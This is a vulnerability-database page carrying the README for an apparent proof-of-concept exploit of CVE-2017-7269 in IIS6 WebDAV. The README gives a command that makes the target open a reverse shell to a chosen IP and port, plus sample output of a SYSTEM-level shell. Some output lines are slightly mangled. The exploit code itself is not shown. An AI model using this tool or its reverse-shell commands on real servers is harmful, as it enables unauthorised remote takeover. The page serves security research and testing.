CVE-2017-7269 PoC — Microsoft Internet Information Services 缓冲区错误漏洞

Source

Associated Vulnerability

Description

CVE-2017-7269

Readme

# EN
**GenWebDavIISExploit** is a PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.

## Disclaimer

This project is intended for **educational purposes only**. Use this tool responsibly and only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## Features

- Remote code execution on vulnerable IIS6 WebDAV servers.
- Dynamic payload generation with user-specified reverse IP and port.
- Easy-to-use command-line interface for rapid exploitation.

## Prerequisites

- **Python 3.x**: Ensure that Python 3 is installed on your system.
- **Network Access**: Ability to connect to the target machine's IP and port.

## Usage
### Command-Line Arguments

- **Target IP**: The IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address where the reverse shell should connect.
- **Reverse Port**: The port number on your system to receive the reverse shell.

## Example

```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

## Usage Example

```bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received a connection back from 192.168.1.10:12345
[+] Remote access successfully established!

C:Windows\Windows\system32> whoami
nt authority\system

C:\Windows/system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS-127.00.1 . . . . . . . : example.local
      IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
      Subnet mask . . . . . . . . . . . . . . . . : 255.255.255.0
      Main gateway . . . . . . . . . . . . . . . . : 192.168.1.1
    
```


## Notes
- Ensure you have a listener running on the specified reverse port to capture the incoming reverse shell.
- Use this tool only on authorized systems to test for vulnerabilities.


# RU
**GenWebDavIISExploit** is a PoC tool that demonstrates exploitation of a known vulnerability in the WebDAV component on IIS6. This tool is created for educational and research purposes to show how the vulnerability can be exploited to execute arbitrary code on a remote server.

Translated with DeepL.com (free version)


## Disclaimer

This project is intended **for educational purposes only**. Use this tool responsibly and only on systems that you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## Features

- Execution of remote code on vulnerable IIS6 WebDAV servers.
- Dynamic payload code generation with IP and port specification for the reverse connection.
- Simple command line interface for quick use.

## Requirements

- **Python 3.x**: Make sure you have Python 3 installed.
- **Network Access**: Ability to connect to the target machine's IP address and port.


## Usage

### Command line arguments

- **Target IP**: IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address to which the reverse connection should be established.
- **Reverse Port**: The port number on your system to receive the reverse connection.

## Example

```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

## Example usage

````bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

Translated with DeepL.com (free version)

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received back connection from 192.168.1.10:12345
[+] Remote access successfully established!

C:Windows\Windows\system32> whoami
nt authority\system

C:\Windows/system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS connection suffix . . . . . . . : example.local
      IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
      Subnet Mask . . . . . . . . . . . . . . . : 255.255.255.0
      Default Gateway . . . . . . . . . . . . . . . . : 192.168.1.1
    
```


## Notes

- Make sure you have a listener running on the specified reverse port to intercept the incoming reverse connection.
- Use this tool only on authorized systems to check for vulnerabilities.

File Snapshot

 [4.0K]  /data/pocs/100479bf52034f6788e657496f2755b9724b5f14
├── [ 15K]  GenWebDavIISExploit.py
├── [1.0K]  LICENSE
└── [5.2K]  README.md

0 directories, 3 files

Remarks